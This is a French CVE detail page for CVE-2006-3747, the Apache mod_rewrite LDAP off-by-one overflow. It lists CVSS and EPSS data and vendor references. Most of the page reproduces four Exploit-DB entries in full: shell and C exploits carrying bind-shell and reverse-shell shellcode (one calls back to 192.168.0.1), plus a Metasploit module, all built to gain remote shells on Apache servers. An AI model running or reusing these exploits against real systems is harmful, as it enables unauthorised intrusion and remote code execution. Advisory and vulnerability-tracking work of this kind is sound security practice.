CVE-2006-3747 : Détail

CVE-2006-3747

93.52%V3
Network
2006-07-28
16h00 +00:00
2021-06-06
08h10 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 2237

Date de publication : 2006-08-20 22h00 +00:00
Auteur : Jacobo Avariento
EDB Vérifié : Yes

#!/bin/sh # Exploit for Apache mod_rewrite off-by-one. # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # # Thx to xuso for help me with the shellcode. # # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified # for avoiding apache url-escape.. Take a look is quite nice ;) # # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at # 0x0834ae77 for any other version/system find it. # # Gulcas rulez :P echo -e "mod_rewrite apache off-by-one overflow" echo "by jack <jack\x40gulcas\x2eorg>\n\n" if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi host=$1 echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\ %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\ %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\ %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\ %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\ %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\ %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\ %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\ %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\ %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\ Host: $host\r\n\r\n" | nc $host 80 # milw0rm.com [2006-08-21]
Exploit Database EDB-ID : 3996

Date de publication : 2007-05-25 22h00 +00:00
Auteur : fabio/b0x
EDB Vérifié : Yes

/* apache mod rewrite exploit (win32) By: fabio/b0x (oc-192, old CoTS member) Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003) original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/ Usage: ./apache hostname rewrite_path Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard Example: ./apache 192.168.0.253 test [+]Preparing payload [+]Connecting... [+]Connected [+]Sending... [+]Sent [+]Starting second stage... [+]Connecting... [+]Connected [+]Sending... [+]Sent [+]Connecting to shell Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\Apache Group\Apache2>exit exit [+]Owned */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 80 #define PORT2 4444 #define MAXDATASIZE 1024 char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90"; char shellcode[]= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" "\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42" "\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56" "\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c" "\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61" "\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c" "\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e" "\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70" "\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68" "\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31" "\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a" "\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67" "\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76" "\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65" "\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74" "\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35" "\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44" "\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33" "\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69" "\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33" "\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54" "\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52" "\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49" "\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74" "\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75" "\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e" "\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b" "\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47" "\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76" "\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50" "\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66" "\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54" "\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32" "\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72" "\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c" "\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e" "\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33" "\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67" "\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41"; char finish[]= "HTTP/1.0\r\nHost: "; char payload2[]= "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18" "\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5" "\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1" "\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3" "\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12" "\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1" "\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1" "\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a" "\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea" "\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38" "\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69" "\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb" "\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52" "\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73" "\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d" "\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a" "\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17" "\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5" "\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b" "\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea" "\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65" "\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a"; int main(int argc, char *argv[]) { int sockfd, numbytes; char buf[MAXDATASIZE]; struct hostent *he; struct sockaddr_in their_addr; printf(" Exploit: apache mod rewrite exploit (win32)\n" " By: fabio/b0x (oc-192, old CoTS member)\n" "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n" ); if (argc != 3) { printf(" Usage: ./apache hostname rewrite_path\n"); exit(1); } printf("\n[+]Preparing payload\n"); char payload[748]; sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]); printf("[+]Connecting...\n"); if ((he=gethostbyname(argv[1])) == NULL) { printf("[-]Cannot resolv hostname...\n"); exit(1); } if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("[-]Socket error...\n"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-]Unable to connect\n"); exit(1); } printf("[+]Connected\n[+]Sending...\n"); if (send(sockfd, payload, strlen(payload), 0) == -1){ printf("[-]Unable to send\n"); exit(1); } printf("[+]Sent\n"); close(sockfd); printf("[+]Starting second stage...\n"); sleep(3); printf("[+]Connecting...\n"); if ((he=gethostbyname(argv[1])) == NULL) { printf("[-]Cannot resolv hostname...\n"); exit(1); } if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("[-]Socket error...\n"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT2); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-]Unable to connect\n"); exit(1); } printf("[+]Connected\n[+]Sending...\n"); if (send(sockfd, payload2, strlen(payload2), 0) == -1){ printf("[-]Unable to send\n"); exit(1); } printf("[+]Sent\n[+]Connecting to shell\n"); close(sockfd); sleep(3); int exec; char what[1024]; sprintf(what," nc -w 10 %s 4445",argv[1]); exec=system(what); if (exec!=0){ printf("[-]Not hacked\n"); } else { printf("[+]Owned\n"); } exit(1); } // milw0rm.com [2007-05-26]
Exploit Database EDB-ID : 16752

Date de publication : 2010-02-14 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow', 'Description' => %q{ This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations. }, 'Author' => 'patrick', 'Version' => '$Revision: 8498 $', 'References' => [ [ 'CVE', '2006-3747' ], [ 'OSVDB', '27588' ], [ 'BID', '19204' ], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ], [ 'URL', 'http://www.milw0rm.com/exploits/3680' ], [ 'URL', 'http://www.milw0rm.com/exploits/3996' ], [ 'URL', 'http://www.milw0rm.com/exploits/2237' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Platform' => ['win'], # 'linux'], 'Payload' => { 'Space' => 636, 'BadChars' => "\x00\x0a\x0d\x20", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Targets' => [ [ 'Automatic', {} ], # patrickw tested OK 20090310 win32 ], 'DisclosureDate' => 'Jul 28 2006', 'DefaultTarget' => 0)) register_options( [ OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]), ], self.class) end def check res = send_request_raw({ 'uri' => '/', 'version' => '1.1', }, 2) if (res.to_s =~ /Apache/) # This could be smarter. return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit # On Linux Apache, it is possible to overwrite EIP by # sending ldap://<buf> ... TODO patrickw trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' print_status("Sending payload.") send_request_raw({ 'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded, 'version' => '1.0', }, 2) handler end end
Exploit Database EDB-ID : 3680

Date de publication : 2007-04-06 22h00 +00:00
Auteur : axis
EDB Vérifié : Yes

#!/bin/sh # Exploit for Apache mod_rewrite off-by-one(Win32). # # by axis <axis@ph4nt0m> # http://www.ph4nt0m.org # 2007-04-06 # # Tested on Apache 2.0.58 (Win32) # Windows2003 CN SP1 # # Vulnerable Apache Versions: # * 1.3 branch: >1.3.28 and <1.3.37 # * 2.0 branch: >2.0.46 and <2.0.59 # * 2.2 branch: >2.2.0 and <2.2.3 # # # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # first POC by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # http://www.milw0rm.com/exploits/2237 # # # # to successfully exploit the vuln,there are some conditions # http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html # # # some compilers added padding to the stack, so they could not be exploited,like gcc under redhat # # for more details about the vuln please see: # http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded # # # no opcodes needed under windows! # it will directly run our shellcode # # my apache config file # [httpd.conf]: # RewriteEngine on # RewriteRule 1/(.*) $1 # RewriteLog "logs/rewrite.log" # RewriteLogLevel 3 # # # Usage: # [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141 # mod_rewrite apache off-by-one overflow # # [axis@opensystemX axis]$ nc -vv -n -l -p 1154 # listening on [any] 1154 ... # connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077 # Microsoft Windows [¡ã?¡À? 5.2.3790] # (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp. # # D:\Apache\Apache2>exit # exit # sent 5, rcvd 100 # # # # shellcode µÄbadchar£¬ÎÒÕâÀïÓõģ¬Æäʵ²»ÐèÒªÄÇô¶à # ÎÒ¸úµ½Á½¸öbadcharÊÇ 0x3fºÍ 0x0b ÆäËû¶¼ÊÇÒÔÇ°Éú³ÉshellcodeÏ°¹ßÐÔ±£ÁôµÄ # 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b # echo -e "mod_rewrite apache off-by-one overflow" if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi host=$1 #use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\ # %3f to trigger the vuln %3fA%3fA%3f\ #string "CCCC.." is any arbitrary string, use %3f to trigger the vuln #%90 is the machine code we will jmp to(NOP),run shellcode from here `perl -e 'print "C"x10'`%3fC%3f%90\ # shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded `perl -e 'print "\ \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\ \x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\ \x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\ \x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\ \x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\ \x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\ \x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\ \x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\ \x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\ \x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\ \x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\ \x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\ \x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\ \x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\ \x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\ \x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\ \x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\ \x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\ \x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\ \x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\ \x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\ \x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\ \x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\ \x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\ \x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\ \x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\ \x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\ \x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\ \x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\ \x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\ \x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\ \x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\ \x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\ \x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\ \x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\ \x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\ \x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\ \x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\ \x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\ \x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\ "'`\ HTTP/1.0\r\n\ Host: $host\r\n\r\n" | nc -vv $host 80 # milw0rm.com [2007-04-07]

Products Mentioned

Configuraton 0

Apache>>Http_server >> Version From (including) 1.3.28 To (excluding) 1.3.37

Apache>>Http_server >> Version From (including) 2.0.46 To (excluding) 2.0.59

Apache>>Http_server >> Version From (including) 2.2.0 To (excluding) 2.2.3

Configuraton 0

Canonical>>Ubuntu_linux >> Version 5.04

Canonical>>Ubuntu_linux >> Version 5.10

Canonical>>Ubuntu_linux >> Version 6.06

Configuraton 0

Debian>>Debian_linux >> Version 3.1

Références

http://secunia.com/advisories/21266
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/21307
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3995
Tags : vdb-entry, x_refsource_VUPEN
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.vupen.com/english/advisories/2006/4300
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/23028
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3282
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/21284
Tags : third-party-advisory, x_refsource_SECUNIA
http://www-1.ibm.com/support/docview.wss?uid=swg1PK29156
Tags : vendor-advisory, x_refsource_AIXAPAR
http://secunia.com/advisories/22523
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=130497311408250&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/23260
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3264
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/21313
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29849
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4015
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/21273
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA08-150A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/21478
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200608-01.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/22368
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/26329
Tags : third-party-advisory, x_refsource_SECUNIA
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102663-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://secunia.com/advisories/29420
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/19204
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/21245
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4868
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/30430
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/4207
Tags : vdb-entry, x_refsource_VUPEN
http://www.mandriva.com/security/advisories?name=MDKSA-2006:133
Tags : vendor-advisory, x_refsource_MANDRIVA
http://marc.info/?l=bugtraq&m=130497311408250&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/21315
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.kb.cert.org/vuls/id/395412
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/21509
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/21346
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1016601
Tags : vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2006/dsa-1131
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/21247
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3884
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2008/1697
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22262
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/1312
Tags : third-party-advisory, x_refsource_SREASON
http://www.debian.org/security/2006/dsa-1132
Tags : vendor-advisory, x_refsource_DEBIAN
http://www-1.ibm.com/support/docview.wss?uid=swg1PK29154
Tags : vendor-advisory, x_refsource_AIXAPAR
http://secunia.com/advisories/21241
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3017
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2007/2783
Tags : vdb-entry, x_refsource_VUPEN
http://www.ubuntu.com/usn/usn-328-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www-1.ibm.com/support/docview.wss?uid=swg24013080
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.osvdb.org/27588
Tags : vdb-entry, x_refsource_OSVDB
http://lwn.net/Alerts/194228/
Tags : vendor-advisory, x_refsource_TRUSTIX
http://secunia.com/advisories/22388
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/21197
Tags : third-party-advisory, x_refsource_SECUNIA